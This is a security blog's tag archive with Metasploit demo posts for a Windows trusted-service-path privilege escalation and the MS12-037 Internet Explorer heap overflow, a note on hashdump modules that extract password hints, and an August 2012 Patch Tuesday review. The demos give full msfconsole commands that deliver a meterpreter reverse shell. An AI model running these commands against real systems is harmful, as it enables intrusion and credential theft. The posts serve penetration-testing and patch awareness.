Tag Archives: Microsoft

Metasploit Windows User Password Hints Decode Auxiliary Modules

Metasploit provide some Microsoft Windows auxiliary modules who will permit you to dump local accounts from the SAM Database. These modules, “post/windows/gather/hashdump” and “post/windows/gather/smart_hashdump”, have been updated recently with addition of Windows users password hints. A nice blog post “All Your Password Hints Are Belong to Us” from claudijd explain how they have successfully extract/decode user password hints from the Windows registry. Here under a small video demonstration of these modifications.

Nice job from @claudijd, @reynoldsrb, @_sinn3r and @TheLightCosine for these nice upgrades 🙂

Windows Service Trusted Path Privilege Escalation Vulnerability Metasploit Demo

Timeline :

Metasploit PoC provided the 2012-08-14

PoC provided by :

sinn3r

Reference(s) :

None

Affected version(s) :

All Microsoft Windows with applications having unexpected paths

Tested on Windows XP Pro SP3 with :

OpenVPN 2.1.1

Description :

This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as example: C:\program files\hello.exe; The Windows API will try to interpret this as two possible paths: C:\program.exe, and C:\program files\hello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalate privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section “Calling Processes Security” on page 676.

Commands :

You need a valid session on the target for example with :

exploit/windows/browser/ms12_037_same_id

Then execute the following exploit to detect vulnerable services

use exploit/windows/local/trusted_service_path
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
set LPORT 4443
exploit

sysinfo
getuid

MS12-037 Internet Explorer CVE-2012-1876 Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by VUPEN Security and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2012-03-14
Public release of the vulnerability the 2012-06-12
Details of the vulnerability provided by VUPEN the 2012-07-10
Metasploit PoC provided the 2012-07-31

PoC provided by :

Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.

Commands :

use exploit/windows/browser/ms12_037_ie_colspan
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Microsoft August 2012 Patch Tuesday Review

Microsoft has release, the 14 August 2012, during his August Patch Tuesday, two security advisories and nine security bulletins. On the nine security bulletins six of them have a Critical security rating.

Microsoft Security Advisory 2661254

MSA-2661254 is the suite of the Flame malware attacks consequences. Microsoft allow the usage restriction of certificates with RSA keys less than 1024 bits in length. This MSA will be pushed as a security update during October 2012 Patch Tuesday, so you have two months to assess the impact of this update. We strongly recommend you to test this MSA before pushing it on all your Windows, KB-2661254 provide you known issues with this security update. For example, Internet Explorer will not allow access to a website that is secured by using an RSA certificate that has a key length of less than 1024 bits.

Microsoft Security Advisory 2737111

MSA-2737111 is dealing with vulnerabilities in third-party code, Oracle Outside In libraries, that affect Microsoft Exchange Server 2007, Microsoft Exchange Server 2010, and FAST Search Server 2010 for SharePoint. These Oracle vulnerabilities were patched during July 2012 Oracle quarterly patch cycle. MS12-058 security bulletin addresses this issue for Microsoft Exchange. Also, these Oracle Outside In vulnerabilities have been publicly disclosed.

MS12-052 – Cumulative Security Update for Internet Explorer

MS12-052 security update, classified as Critical, allowing remote code execution, is the fix for four privately reported vulnerabilities. CVE-2012-1526 has a CVSS base score of 9.3 and was discovered and privately reported by GWSlabs. CVE-2012-2521 has a CVSS base score of 9.3 and was discovered and privately reported by Derek Soeder. CVE-2012-2522 has a CVSS base score of 9.3 and was discovered and privately reported by Sung-ting Tsai and Ming-Chieh Pan of Trend MicroCVE-2012-2523 has a CVSS base score of 9.3 ans was discovered and privately reported by Cris Neckar of Google’s Chrome Security Team.

MS12-053 – Vulnerability in Remote Desktop Could Allow Remote Code Execution

MS12-053 security update, classified as Critical, allowing remote code execution, is fixing one vulnerability CVE-2012-2526. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Edward Torkington.

MS12-054 – Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution

MS12-054 security update, classified as Critical, allowing remote code execution, is fixing four privately reported vulnerabilities. All these vulnerabilities were reported by Yamata Li. CVE-2012-1850 has a CVSS base score of 5.0. CVE-2012-1851CVE-2012-1852 and CVE-2012-1853 have a CVSS base score of 10.0.

MS12-055 – Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege

MS12-055 security update, classified as Important, allowing elevation of privilege, is fixing one vulnerability CVE-2012-2527. This vulnerability has a CVSS base score of 7.2 and was discovered and privately reported by Matthew Jurczyk of Google Inc.

MS12-056 – Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution

MS12-056 security update, classified as Important, allowing remote code execution, is fixing one vulnerability CVE-2012-2523. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Cris Neckar of Google’s Chrome Security Team.

MS12-057 – Vulnerability in Microsoft Office Could Allow Remote Code Execution

MS12-057 security update, classified as Important, allowing remote code execution, is fixing one vulnerability CVE-2012-2524. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Andrei Costin.

MS12-058 – Vulnerabilities in Microsoft Exchange ServerWebReady Document Viewing Could Allow Remote Code Execution

MS12-049 security update, classified as Critical, allowing remote code execution, is fixing 13 vulnerabilities discovered in third-party code Oracle Outside In librairies. These vulnerabilities have been publicly disclosed.

MS12-059 – Vulnerability in Microsoft Visio Could Allow Remote Code Execution

MS12-059 security update, classified as Important, allowing remote code execution, is fixing one vulnerability CVE-2012-1888. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by Alexander Gavrun.

MS12-060 – Vulnerability in Windows Common Controls Could Allow Remote Code Execution

MS12-060 security update, classified as Critical, allowing remote code execution, is fixing one vulnerability CVE-2012-1856. This vulnerability has a CVSS base score of 9.3 and was discovered and privately reported by an unknown security researcher.